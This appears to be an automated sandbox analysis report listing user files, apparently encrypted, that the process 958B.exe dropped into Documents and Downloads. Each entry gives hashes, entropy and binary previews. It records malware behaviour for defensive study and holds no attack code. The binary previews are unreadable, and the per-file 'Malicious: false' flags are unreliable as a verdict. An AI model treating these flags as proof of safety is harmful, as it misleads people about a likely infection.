Preview:	TQDFJk. .o..'......YU..i..g.n.O..1.....-.2.....K..z..H..o..c.K.,.Z.r... .>../....zR.@.[".KX?m./.`.x..m.NHA.r'...s2..a..........y+.9........., .M..1.iz(.5.l`?/s..9........$!Z\|).J....9h.i9..u...7.U.e...Xn...&.61Oq...-,hiK.......<....Z?zU.7{H.7a>..D.}z:.H./_.A<q...I.....U.X.A.b0... ..o.3."..p........7.o....t.+[.F...a..{...h,.I......3J...;.-. .........q.1....[~..g]_:$...q.........H.....H....b...GX...2..I....d..."X.v.B............x.\|"i..7...\.N.X..dE....].=......=.....%..#..[H.[...o.n.7>o..$<.CL..OU....F.J.-;.6a.w ....s)..'#`~c...\|.\.Y...^.*nWa@..5..{..z}.0/%n.#...L8.j.J...1.n,(>l.S....v.h.#....MB.R2..".W. ........f...jo....V..S./1...O....`3....s.. .%..V@...W.....Q.#.7.z.......!...\......r.G.......zz.U......US..$(...{.{A.{V..'u.[.u..X.(_)..C..Q.....1.....Jyw.n%.Pws.7..`&)...$....\|.2o......X.. ....-..OI...../1.Ej......a).\|..t..066{y.z..<......Xx.....U.ZW.6.J..JL..UP...J\N.Mj.j.?0BGA.. :!c.>.>N.\...5..!8.y.F......?.3. ..sC.T..eQ....

C:\Users\user\Documents\TQDFJHPUIU.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857643678478374
Encrypted:	false
SSDEEP:	24:9lgtbUiMA3WP/qa9BdM7Eho46BnG3bryZCJ9A1la9IMwooabGabD:9uQvIit/MIb6xZCQ10yMqabrD
MD5:	2DF6BDCF001687A9E6147476E1440653
SHA1:	66931B2ABE953629240CA6B913A0B4099D4B8FAC
SHA-256:	664408285F44AC1E5C45477E271D0DDA54F02FCF2886BA9DE852B31BCD0327D3
SHA-512:	C8B70BB6BF87E5ED969B64EC4F92E0D2EA535472C141DF0F92E152E913216DDDD79339DB76C68602960780076C58F9DB39958337277E1CE4E42AEFBA20EFCF6E
Malicious:	false
Preview:	TQDFJ..M...kC(9}..E.d..v>...(.h.1'.....=`...Zb.~^..........FV(....C...G..a........".lO.:..)cBp.mKW...6.....t.....].G(..;,fa.,......0....&.7e$v.R.-..G..n.N......d.a..^..EVOnxj$..6.Nt.U.{om...:C!.:..#.....Q5......'T.E..........'.H6}..#........Bh.$ .?...hU.4.<m2....I..mHov .......Y.B.)a,$........2V.$.....E...j...o....U..,...~...d5...mR\........L....L...d{..Py..w8A.&..{,.K.H...ox..U&x^3.F.y`.>)...=b5..x.V....u.[y~c...6h&L...\%I.j..77....&.p.%..~.0...v..:...w0..U...- .I.d..;.5....<c.&T...}.7.......F....r......7......(.,Y......!.)..l.v...W...:G...B1..c%?..Z..(\|.R.k.+g..*Y...O..-.F\..&n..U.......=.X5LQ.NH.5.f...E.rz..h. .[...,...k.9?.N?.:.ax./..B!.......Q..P...8IQ..........n......a_...f4..K....G..w.y=.1..E.7.J.m..9jz.5....r._...V6....Av..s..%%d._..%7.`+.$Z..A....~..6.k..R.lg.6.dc.....!...6.....`0..(....w..+/.K.....9..a.....w.N?.l.....<.....de9..E.0.....G...50...8X1g/t..K@......m..R....ik]......B..Z..7...^.@.S...~Pr.G.XF.K.jn[....e.v.q.D9...@R

C:\Users\user\Downloads\BJZFPPWAPT.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.857126349911054
Encrypted:	false
SSDEEP:	24:j5epmuSrol47T3x6rOzZVurCiBvKkAeHa/2UyPr2IeI+ss+uBeIqLZhxbGabD:NeeF6SrurXv6/2UyqIeKVLZhxbrD
MD5:	B54BDFC49701B69686194F30D7223F88
SHA1:	3DA26F013B8C0E38EB1DAE6EC43A5A085DB5A7EC
SHA-256:	795C80D4635EFC1481C86B6A8F9B427536BE29A4B039E4B3D49752D26C6A1A98
SHA-512:	D0CAEB85EF7E3F5A358F1588D1B6278C31F5859FD5ABF5598D2FD930821A313A3A48AAC0C6F17E9B323186F979933323023ADC06842CBD95E553A822A2D7670D
Malicious:	false
Preview:	BJZFP<.....mu.^..G.%...../..,.]......MY/.4.9..%.k.g..L.....\..+.H...o.."1.sO.4....Oj${..G...i.s....j..].]..@......1E..?.....K.\|t...;8:.v,l.1R.WxnT.?\|.D\|..&.h:.....P..%.ms...l.......Y..N...!h..g2@T...C.C.Y....s.'..........~.B0.O3....;k..........b.!.....#.lcG'.^..Wd.MQW @..cr.91....1#.R5.G.g.ZE...O.............iLf....U.h..b1.U.u..+-...;...l..y..v....N...N\..).0./..\|.\|.=[.......Q/...3c0.&j..b.C...<..Bbh.a.....M..5Jd.o..v(...$...?.-BJ.xC....X..v..~....b..y.9.gj2Q....N..1.Eh.....B...V.....W...,..`O[..r...y%.c$.Z.Q...h ..%>)..+5...O....\6...av..I_%.......8#?6...H...U..uY\|....n.>0.$J...........W.<.K.(..X...{5R97....d.8...oL..-...@....~.T...#..W..5........A.,...,.$.1...aLo.P....d.wt.n.t7..Y....dY\...^...5.J....V..WG.......\..a.l\=T.0..N...I.v_.(.M.y).O..}....e.6L.b$..i...Z.">. ......k...e...M+z\RE...5V....[J}!.N.Eo .~..}vn`.......67...OB?f*.._.. ..-.HP.)....N.....".........'.U.{Q..KE;._.I,snM..@.B..D.7..'rc..r.;.=.;...A....;.7.t1...O.l.

C:\Users\user\Downloads\BJZFPPWAPT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854123618348585
Encrypted:	false
SSDEEP:	24:gqAIzXHjwbbIsjZFdLdlnudItUmgXKCIBd55qFHQC/kPw2iDVJrxbGabD:hWbIsjZFdnudI14K5BdHqJQz7iD3xbrD
MD5:	109B2354C26846DB5A7CD7E47DE5B7D8
SHA1:	0D0782720E37325944F0D793414310DC8C3680A7
SHA-256:	22364F7DCFA5DA96E994BC609BFAD866BD14523B173E676E7B2CC210B7397DDB
SHA-512:	263727AAC49A5330E6704123067AF8898E7BF5A29E6592F434B545B79B23C890989EEBA0E0F8C4D957495C955617AEA730253B0D3CE6757AAC014AC1D1432DB3
Malicious:	false
Preview:	BJZFP.......,.O..a.b..i....#.\8p..c2..........(.....n..,.b.n.fY.a.@qlZ.Y6...~6....D..W....$....`Xh.}...y5.8.....\.T_.....}.2ace....p...].....3..).A.!r..0..}.4....]...M..+.9<.7..{].r3...w....x~P......c...Zu...^2...+..`...c.....ian..gv.=&..Q......2.^.SCb_........Q.. !.x.....jZ`..XcT..E8....&......#.HkP`...h.. .B.Q.mH1Wk~...Q...=.n.........yUq._.R#.F... .d.[....1,>.I1.iL.~.n..(....`...]W>...9Y.a.fT..6C..$K.9\|.^..Q(~.>d.H8f..f...H[]..G.....Oj..,.g.O.P..IJk..y..k...S..x...<T.S...dq,.a.l....."......Dm....=.\|G.$t.n........c...gIQ..w..1..g#+".k$g,....Yh....."\|Y..5y.....m....Y..mt.u..&i...e.LmP......}...J...+.._T.X......c]..K...d...A].s.da..k8....-....s...... b..[G$.k6..Ab..:...t..L...i.1..'..6...~..A.._.Q:.$...K..eXWM5!7 .....`a..~9.).\|. {.S.(Ub..>.+..3..`..........z..nZ.`B..>...........Z^.]........).<...Ys......!..\..z.z.P2.....@..M...A..ER.d.B.. ....YH%"....6.[..z.,.D.)....}e..M..S.C..Y.\..'n........8GT.z.q..O.P]B..{d....,........_.....^.

C:\Users\user\Downloads\CZQKSDDMWR.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.854969403452752
Encrypted:	false
SSDEEP:	24:p7ovI5BTK6yg7IBajRSCfUUSuzzmk/OkzKCBH3botnR/yveSDA1MbGabD:p0w5s6yuIIRSCXfmgvzKYYR/yeVWbrD
MD5:	F272CA9AC1E600044814B7E8054FF28E
SHA1:	6EDBDED9D09D97A6B1C4FDB1D348F393D588CFA4
SHA-256:	E7628BC1135E3DEDCB48A7B4C79A084D254D80B422A232BA727F43385928F2E8
SHA-512:	E44DD13A1EDE305B3526AF450CCCE03FE4001CDFCAECFC025A2098B98128BBB68A3C889CAD1D53B852D1B7A75307ED4FCAEDD0855768C13A96279A251F355C2E
Malicious:	false
Preview:	CZQKS...y^.../...}....8....^.h._..R.D....pd.A.4...........A....Bo....\R..X...>.u5.S]p........eJ.{4...G...!/\|..j..su.....\|....H.".6...<.2.8jt.....P.....@....T...)..\..Vb.4.....)..w.X.......+.P(B..G.#O...\I....m...6..\|.&....L....r...(T..9.]}.$..x.G.\|.1.....&..-.m.8....?.[...9l.m.......O....#..t]...S.eD..8?i....6....5{..D..=.8..`..7....j.M....V....5...d.?..a.(.......x]7..9...a...=.{......_..R.^..4..s.I..5u.z'.?.f...FW.q.w......M..B.......s=...4. M.....p....\|N.!_F.l....+X....b7m...L.....]&......dT.. ....._....5..$.O.Q%...6...@V.b.Q.6...+R..0?..]..mc.e(.A{...>...W....p..&.9.....S...Ha.z.J..w...:....I."..L.V.......jv.Tw..c..Y.%K5..r....c..K...e...Z..+..x..1.......W.;v.......0..9R......}4d%...$.3.b.l........%..U.4....$awu.,...o&..b4.......f...$..%..]1.:nb./.g.....`....L..f.....Q.....p...J.O[..xf..=y..WB...w6...u%.M...uVE.C...0..F{7..l......=k=.....R...F}>.]..+.......VE....F.!.m"N....\...'..i.l...I.......]T....fzz2z....{A0.{.Q..u.(D.

C:\Users\user\Downloads\DUUDTUBZFW.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.834959500262144
Encrypted:	false
SSDEEP:	24:+ihGv2cGivlueXQv/OUrxrTvVLhcSaxcdWZ0ZC6Ix+UNbGabD:phGvai4fvVJTv9mSa1yBIYUNbrD
MD5:	3FDE9327203839311CA27AFC86E1A17E
SHA1:	D77C8AFB8E3780E8D8C2C191294B8976E4079A85
SHA-256:	856EB8EDEB764497E8AC1FC415B0122462507AEE1045F55E5825269488449010
SHA-512:	AF999F3956885205F9008916567141211ADEA49ED71F1F4C059CE53BB576091BA9A78D94AEDC56287477AE77507B4EC71A53F8BB7E72E9C9926B81631BBD888F
Malicious:	false
Preview:	DUUDT.z...r.5...\|.HsIhP.3B4...C..&.......bZD...S.Ur...?$.....6~Nk..48.K=.S..]..:.e.#T... .L.^.EX......K...g.,8....a.....%.'.CB..1..ST\|y"...(.{.z.P\.....f..^..j. .Y0fPw;?./.E...<.5....,.. .0.......F..7G.. .^{.[]....'.R...g]k......quh"....P..../1d.%\|y.r+:..V.........8x.Z...o.IV)..!.....O...3...@.&B......c^*;.;.,..I]..O....\|.H.95....O......$..s.7f.q.u.,..L..E...t..B{J.)T....VY..!(o..o.x.7^/.-.8@....h.t....`2..d.V....e,...2..+..+.e.s.........z..bt..)o{..~.H.wpy4]~Y..;.+...5.....l..s..u..4`...8.s.N..D.3W.....u...^.H.!n...:.C.%.p>.wX..z1..}.hym..\I..#C.l...!.2c].V.A...O.i.-.c..\|......B.o..3.V:.:`...[...A...(qB36\|..]8Q...[...".8...v...1.r...r.s........l..F..D.j....yaV.....].....(.G.^.9....1P....~j...1...;ZsL...B./%....Z....w.}...:1.\.....9D......#zV.1.E..>....;L.5?aIq.&LD...Yn.G.q...CU..W...R..X.....9..!.q\W./..5.6..2...S.k...^..7.\|G.gn.qI....w../....=.MW.."...E.....1..{k.A.R..d..0b7.._..&.L..PE.....r.K..x.h..uS.]N.4Q;$...^.{.bB.2....1..N.

C:\Users\user\Downloads\EFOYFBOLXA.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	old-fs dump file (16-bit, assuming PDP-11 endianness), Previous dump Sun Jun 25 01:52:06 2017, This dump Fri Mar 26 03:13:14 1993,
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.856977315028578
Encrypted:	false
SSDEEP:	24:lHHsB41smGTS/iwQyclJ8hMZnrHU1e0h65xuBGAQc4phw9OhIQtU7jKOqzsx6Rc9:lsuOmES/iwufKMZrTp5xG0c4puqtU6N0
MD5:	8AD4FC5E5DB6AE6FAAD3E5FD80B6FAD9
SHA1:	F2484D2C8B95F4F2A5F9FB2DA468E7526F4130A4
SHA-256:	ADB45CFEB62F50943D6D0353DE33D9FC85C107CE8917BFE5C8ECEADF8EC79F3A
SHA-512:	46FF52F1A50EF0567FF96E1B383CB133967C1CA747E5CC40796B80137A856F65828145283319C534842B2228744D01335F2D7717020CD3BD09EC5413B7FB51A8
Malicious:	false
Preview:	EFOYF..+.t...=.{..k..$.k.QT.]W7..3Oa.a.M..,.........X.@.wL.n..i.....!DKfU.M..U..T'UL......4%.q...uxO..`H...l\|.{9....}.[`m.s#`...l.`gE..in\d..P..%.........}.....[...G.L2..............6i...,.o.'.X.D....f....Ns...F..ia.a..n.......i..i..r.)....S.....~.....`.......yO`c...o...X!........$/.......>.....tX..Q.;4....Fb.[..T-?.:r..z...5....l......T<m&Fl..}...b.1.F..lv#.....]&.........!.B.....bV..6Ej.s..>e.c...trqF..........#....2.#..7.......d....#4u.G1.........A..Gt...@.=x..G..5.U.u.E..\.7y....$...\|.......T.....d.X..,.cT.p.8.P6..e..%....h!!.yTi.l2I.3Az..A.,.M<_.0e.c.{h.'..@R)9....6.....KUC...(c.b...4.E..F.n....I..a?.v..p.J.g....Yd....~.5.H<(s...m...E...#....If.....,.lz..]S...2M....&G....G.....I...@.]&.....}...}...x....t..q...+..B.p.a..............}..._.....5G.....'X...RRJc6.ur&..=)?n8.`.....d.@....q...v@.&M.........tN..c.+B.I..Z".......s..5....kH..[....H!...$r..w..5..\.1u_0..Ave......,k.G..n.`S...G.S..+..B.../.k^.'.6;P.].I..c.V.....kt...f.#*d.

C:\Users\user\Downloads\EIVQSAOTAQ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8238584511096585
Encrypted:	false
SSDEEP:	24:RMNDWT+8uxSSuKCGkLWrf2YlnaweavpWoqm0mZPo6l5A/9kf8fR+64990OeXpbGE:CYT6ESuak0Omatavn50SokA/mf8fR+67
MD5:	5741F29F5CBA93D05AD01BF6FB3E783D
SHA1:	D00CD87545769A591983E0ACBB80147FEA1DD6F0
SHA-256:	0217E96A10391717EDEE4E899A9024A1C892368FC73803BD4BE09ED3503A4F72
SHA-512:	5D9B1257F6C34372BB67E08A5FB6D83A5EC2867D31353CED74D7281F918D251FF1EDF77A1C5685B4C6EA90451F5A3BC1A235A357EA43DE6F490C75803031683E
Malicious:	false
Preview:	EIVQS..Uq ..E.............\..n..}.....v.X.s..a..y..1e....U....r0...;.R..F#m....!...f..E.L^J..+...[.Z.......Eq..E.@.K......k.#WF.....;L.(2.....j\e.M...P\aa.....:,..c..\|;?.F.=..O9...".K.s...U.8 v.z.....,.....z..q..^U...Qjv..G...j..y..4.J.pu..%..mf.d..G...Y..M.G.p.........m.....C..c.FWy7..D...+.wAj.7.e....g.w.m.F.".7.."..w..1A.u?q .6ip?...2.GL3....o.....N3.H=...&.t)X...z...../...t.V9...?.0....,.n..rZ.Y..r...".p.i%..'j...>.q.[....".....].nA.R..Y=RF......."]x.?;EV.P?..u.E-p..w...p}}"0}].(..D,../.3..d.0.+c...;`...<a..(.....:.....qzn>...x.`}~G.b.?......bZ.[.p..............K.....oS....q...2.B...A....7._.B..1.a...yTE.!].,..p....aK.0..Q.s.{.....b...o>[(..:......BK....c}..@....wI.....T.(2.q....\|P....<.}.@Fx...qM/:B....tEj.3.....F.....b......`.AW.d......N...Z...n.z.o...n......`...4.<qJ...]qW.:...AU...E.'G{..g.......\|..>^...18.,mZ:..Q.0........4..x-`..i.."...<).@C....s...)5.d....y/...~%O........{..h.....F..*.V......I..k..{..A7 R..K.W.B$.i...C$.K..{g

C:\Users\user\Downloads\EOWRVPQCCS.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845916502416912
Encrypted:	false
SSDEEP:	24:Q2Hk/1Muj0ExeT4YipNs0WDxlafnOSWjffg/M6SjMry+dOr4OrbGabD:QxuaN7CxQfn3WjfmS/+oUOrbrD
MD5:	23D4435852CA9F18925F252F516B9E8A
SHA1:	897461409359EB386337695E12C5DF1E2A877502
SHA-256:	91E2EF41B97926637AEE6187A7814C0FAF6C14ED5D7E15C11CB06ED74F86F663
SHA-512:	4A880CBDC396CEB96DE70FEA5D2AAE2BCEBB42E0BD4D8D57681F7080D00FDBCE1C2B236374979C3A7DAE387D9F10885FCFC28A6769721428810AC06C6CC20D61
Malicious:	false
Preview:	EOWRVo.......4...p...8"O......:...T..M.4!3.:..x...B.n..2.%M....P...l....A9.....@A...!...e.`W...c..y!RJ"....D./n<.j..k.;N.j..&.m.........j9.t..?.xF@..+...7.e.hr....W~.._..(.0.7....LtI..}.+.U?....w...ab.f..>....dM...ePKJR..\|..l...3I.e../...8....-..V.9.6..u.G...M4.Nyy...P.....!X?.....y....W.@.3o..{.........c..."...c..k........y....].A\.[..d[...}.....N....];..j:.....t~8!C4....c..}....MF:....#"...w.ci...(..)!.0H...U.~%.i....?o.....X.]}.0.uY]..=.v.).%.1.'.t8_8b.7...wM.Xg.1f.....B\...J->....m.....u=..bx:x...\|..B..... E...%.7u5...JU.F.....oU....U..6...#4.f.!.3e.O.E...V.(w9....l._X}...3..MD..+...or..^i.. ^..o..Sv...I>....P+j....F8.^YU'O...d.<....;...vUw]...$.+R..#..;..sGC...w&.c..(..2.......Fg.U...Yx.v....Z..>,lD.I.a%C.1?. ..k.{..6[......;...B....w.:........a...r...\'.H....)...P.V..>R).[....qE..{..:. .K...>...m.\.\.HB..../V..\|......wm...#.....4...B.N.(.F.\|....~.>...s.7.M.....1{.#,...'.h..e.z......w..1..... ..&.I6...[.......@.$<.t+'EZc..3

C:\Users\user\Downloads\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8622800549500695
Encrypted:	false
SSDEEP:	24:ZHPEEwXPaBq4slA7TRxNx9trdprV2pOVLpOJtNcv4bGabD:pZBelgNd5pquLI3FbrD
MD5:	C52A9CF9EA754E31DC3E27C024E2DC9B
SHA1:	4359BF6430E5CB19426C692CB231941F915A7A71
SHA-256:	A0F73A561DEA34AB4225DC40EC53CB6380B4D3168A0F58155C023672DC83FC42
SHA-512:	64243E7212E2B80723FBF0BEEE4AEEF5F96571CE6C77C494829ED4CD6CD82624FF454008469E4D71D59DE849E81C839BE3D5156AB62A26232591A03FC1822BCA
Malicious:	false
Preview:	EOWRV...0L.~...!.P.....4Y..R...O..-.........8.:.....4....3A>9..IbT]". m..\...7K..A8.g'h.....@..]....wz.{..x.......=v9y.;.O..Eqk;..Z...B3..N.....T`....(.PM.....d....u<..G.M.@..,.A.......U ...{.A.ji._i...4...m(.''.(..3~+.:1\3.H...<..(MK3..hLH.....(............m.}3$.FFv......l.W7o......f..3....<n....0f..V)..Z.....\|....n....}f...,...aXE<..a9..mz...z...!..p:....`..6g..GH.)..l}u.t{\....ld...K@.Q.C1W.l0u...c..(....k1+....a.,O@~.J.E..Gg...O...6.8.`...Z..'fn...D.;L..29...m.Ir.....MG.0.D...;....~.h.?.......j....>.n.-.B..s...U....A..O!udV...t.....L..A.8.LQ....`{e....;.M~.y...4...qt..d..6.g.......).L.._...bBh2.K.W7....q....QZ.\).>.x.g...WD.~!Q:".+}.....f_y.X......d.~_....k...`.5...\.F..0(.8.s..........IR....$5k.RIY...q..r.. ......gu.!>..b( .7...........?p...'...<=.C].?$p...F..1sP.=.u......p.....'.i\..#..E....{.!xI?.&.r...$......~`n......7EE{%....t......z..V.p.2@..4...E....r...Ajy.U.......I....n.h6=.(..1S....X.%.RS(.p...>....C..q. ~]....}f.

C:\Users\user\Downloads\EOWRVPQCCS.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.829735477922034
Encrypted:	false
SSDEEP:	24:zf8mgHYy/NfyUDQ5ETotYFwUokQWVjay5zGj2oK7rRSMOnV5ZJ5V6E3O41EEJDbH:zf8G4JyUDeDtcwUoAj75Cj2PzOV5RV6m
MD5:	C8925C44B353F5F6CC4847604DD46E2B
SHA1:	D7CBF1E24F84279C4D09CCDFA7667B83796B822D
SHA-256:	3EB4EEBEDA7C38F0354CAF0C5DBF59032CE203AFF6FF7E84F4F1B6D16C327BCE
SHA-512:	40C2A8A8C97E83642D279B3507580AB409F569C2CE52C324A1A343A542ABBE10A9C77E8159889F138AD0535FF4310A5A31C3F74A2490BBD70F38B5D1E807A8AA
Malicious:	false
Preview:	EOWRV&!)m.fP.<Z2......S.i0).b.+.d.?.{..r.vD.c..xyEF.r.c.M.`.....@^.....00}.3......}...}........n...k....".....KZ....fD...F....I.......3B.6a...3w....w...f>4.r.>m..w7G>..x..B.. [...D..qb.T..;@...-.....M"{%_Zl[...Z....N...m........me..z..g(..d...o.Bc.E..!.r..e...}5>.@..l....y..&.q.....'.8.jBq..-.w.....M.d.T..Y..F.K.Z....<.......n.\..>.H_W..!.<m......f....+..[T].3D....TUR.C......F.jn.RP.....K@o.M..yu./v...[n...........{q.m.d....K...`Gq... ..H....y.T...U._xuo+.A.K..OA..3..D..?..5.5.#.1..J^,...M..7hn...K.X0..h.-+.J..J....>I.).."....rjAo.5.^k.....6....2..uw1........q........m8SR.3YYCif...x~.`.......E\...oX.o..7p.4m.9^....35w\xn.....%sb......9s..&.F$i.6.....W...Q7kF....z....6./..].6X2..k....M..v..^2t.<.15....#...k..-.`.T..t+.....K.....4..xp.zk>......J...x..n....=/.,.H.-)..'%r.=f......-c.'..^[..\.y....@83.a.o]G.wS....P...Q..w...PgjX.5..).0l....J....H@P.TI......m..Zy..1".M#z,....NX..~:.._...$....4.S.7...P.2.'.....*q..e.^.TD...xsJK...^gV.....S...

C:\Users\user\Downloads\EWZCVGNOWT.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.828874068006476
Encrypted:	false
SSDEEP:	24:KWqDzArr7grJqIhdECy8E5IH2SIXB5LIMzqOMCc0KFNoVWFQ63ZrsLBubPf6bGaX:Qyaq0J0IH2lBR0DNmIprsLnbrD
MD5:	FBAE0024A3A90E665E69F1F6D7719DEE
SHA1:	CB4AB894AFC5393D8D90493D0BF8495C54F560F0
SHA-256:	46578B5B5E0D06413B52F5602849EE34B014D502E07813F0081AEED4FDB5A24C
SHA-512:	27977ECD52D7E19B73FE0BE270AE1B5B9FE264DAA32D0D675E724EA7B9EC78097779996E72A33D5DEBA0F3C48E10A667AB414CF7B0816D2D92E58CC703D85161
Malicious:	false
Preview:	EWZCV..K.u../.!gnJ..$.G".1^.`...^z.N.Fwl.v.....aX:lo.%.K.9m....'-W}[._.o5.{o.H.3y"5...Bn..9 8.s...O.dL.B c.(;...1..#.Fy. 2..Ri.6T...v;ics/.],.r.._.c.fw./.../.g.......:hv=$..........h.>.[..<...V.j..f.4h.!.L."c..m.Mu....4.=k...JI...(...Y.....n.\d.....v.9C>.%~`..Hn.g..Q.Cx...9...,CI.X.G}.jt\'B.B...pw....~u....j&yL.5.:.zYx~...HP.@o.G.;ME.Ye...........B.[ ....Q..S,.86E..Z.%w.....3_...\|q..,..b.....[......Q!..SYg............NK..3vV.u.s....#Iy6`.Q.6Y...O...d./...Kyqn&.....].j..=....@#p.....N.Q..J... (.J.zG........!...WL..8..dO.....QoB...lr ..25K......Dl.$?Xx..J.3.'H.M..FI..#...q.....T...e.P...XFQ.&.......<...M....4...n._...T.....Y6E,dpM.F....g..p.e...M..".I....^.c$Z-..U".....c...^D`.R^,....S.c3..L...]......T.~....p....]:.9..R=....e.u^.B.....?.0`.T4...d.I=.....?P..P..X..XQp?.^.x.Al.kV.!t2B~.$..<.U....^..(.@xc.<....Z...#.l.-.%.[.U..lxC.<."O....6$.@..;l.9[Y.GEL..../.3.4.]Z>..P..w\|........8x..C6..w.zf...4.2&..[G....hI.w2...P%..fm.8...3$......*.....1:\..4

C:\Users\user\Downloads\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.875612110349267
Encrypted:	false
SSDEEP:	24:pREY20Gos7gnSBCHsFFiT7CTQke8Zpfga0mokSe8Kx8+O6fk+hjn9YrqbGabD:SdbdBCHsLiA97Zpfgvm7Se8DR6fp9Yuz
MD5:	930B094CCCC52FCFD8E5C0930DF10919
SHA1:	F225752F3E557F329632FBA0817532C5FE8A2093
SHA-256:	6EB710021884131F4451C0045F77E98A2789C1F3056DE254D4EC1DA906472D46
SHA-512:	E8FC2FB1BD82F6B601D45258724775C2B0B35DCBA19D74D23B109EFBD28BFABC3F09C194FDA792252FB5591C56F9968150DAEF008967286B27B690F9410C0CCD
Malicious:	false
Preview:	GIGIYd.T.'.x....~".....PT..u..F\|.n.,:..+.z.F.QQQ..<.ew.m.....4..?..}..C..P.[..>.LY.G.........-..i..o?.z.......]...<........3.bDs.7r..p......:..E.......@....W..K-.T....^....8..\_,G.Wg..I.h..ZlX...aS.^.$Z....+g...q..I.Ga.w.1....)Ms.y[......:.{h..F6_...6...RS.4H...=.u`.u..a....#...x.v.p..`..T....X...N..u...)....z]..G....``.2..5/._....4+.lsi...D...9...x...6.h.}..2.l..v....r.r....3..3}F9.}...,x.#.Y.^........j.OB.....Fg..+..uJap'<.p...p`.n..]...%'c...2.......#......f]...D.`.T..-.x..qoU".$..v.(.......H"...f.<Y........i.B...}.O_;...K0......#p.D..^..-.a..........{_'.......k1bTh.....[Ju.......(......W\2..>....h1.s........o.C..;..T.....'lGOf._\fE.m.......`..7.B9!.H"(.-I.c..[.Q..TSb....k.!..1...f6z..:Lw.....=..B&*$..1. O............d.T..1'.h....B...d..).v.j... .....~`...:..yS....p....\.H_...Q....(k.\.;...\V..L.o+...T.F}{.....t...l.Zn.Iq....q.b....1....C@S....j\....R...H...t^P.c................Z..9VV.T.W..c...uZ.aw.U.^.1.[.X..E.!.,.}DBi`.u/.o.

C:\Users\user\Downloads\GRXZDKKVDB.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853282061013529
Encrypted:	false
SSDEEP:	24:HxPe7WnWKVRieCN3IqVlaDZFvh/sflRQNLswMb0kaBaxbbGabD:HxWCnWKVweqIqVuoRQWwMb0ZBMbrD
MD5:	89ECA3DBF0AC10832E1226A9B1EC656A
SHA1:	E311A49222C7E5EC9D7996FA07038D409CEE88C1
SHA-256:	ABA83DCB51E0383E436466C406572FA5011033C1F98A8FB11B55FCF6815BA9E7
SHA-512:	0A250D80791B617A61A7896143D703EA70E7667BC9CCB7C38EAD25E2A7A42FA30C51F0B5481CFD07D852EDAD179FF0CA9B44A2AAD52559C5CAE36DA65B9A6C2B
Malicious:	false
Preview:	GRXZD.=)...t..o.=o.BO.$A.P......w..."W.u...E....Y.@./..jo......g...[..5...p..;..T.W..P.u........VKhg........`.RI.i.....F......p~(-F.3.. G....-...&Q.q.1E.....t9..9.1.pg$5.;..t......6.O...+.B..J....f..]J.B.....}.r.o...E..j. ..+..n.)V`....z..,..!...r...3...C!...=[. ...=.(.w~Lw..}).q...A;>D.^.?.....J1).lO.+&U....u......c.g.....e......0..z+..A....H........5xD...C.......:5A(}....[.......`tc..+..?Fte)..+...v......LR...........=.&;.^.....vM.z...=d.b)....R...)..T..-u...'...+.....d.\|7..#.....L...9.......-.4..E..i........e1E;l.>.b..Zq..G....c$...di1.7.b)B.X.0.....7d.v.Y...A...s.'./...(.D..[........s.C.]....?....}...FE..i........#Yw~.@{b....U...rr]LM.....Dy_.S...qs....V/N......~.[..^.v...K.U..%...Az..R\....\|....j.......Y{i..)..;G.h..8.......1....;T.NG...a-....}XE.d....~g..XD...6..h...j}..?.....E.....m.......}..n("/..Yy.}>..IC...Ga#cw..\.......t...}jY.F..2Txn...M.Q1}..Z....m....P[.}~.A=.(.ok.._I:..u.K'N...G.....Z^.......`..9....<t;...ZB.........

C:\Users\user\Downloads\GRXZDKKVDB.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.839959082444692
Encrypted:	false
SSDEEP:	24:zrBTX7z/ATC8UU/I6Y5tJNxGLVkCfvGMUv3dXwJ7F4faqoV/vb0bGabD:xTXnCw6YXJN8kuvG7NXwJ7+gV/vb0brD
MD5:	305C19B53F78EE8B42495BDF3456DE37
SHA1:	38B743A333D98BD7294D1A485B3738043B6171A4
SHA-256:	C5F2BDDF264F9C6C83AABC7E5514B23F7710CAFEDCE555D60A8AB26470030C77
SHA-512:	B2D343B0071AA6B04ADA3FCDA69DFCCEAE3F588357C2F620C96948BCFD26A4B50D0D3EF939F9549533C25D7718FCF3F5A6E9EA2119A7209ADA58D63F1E2FA156
Malicious:	false
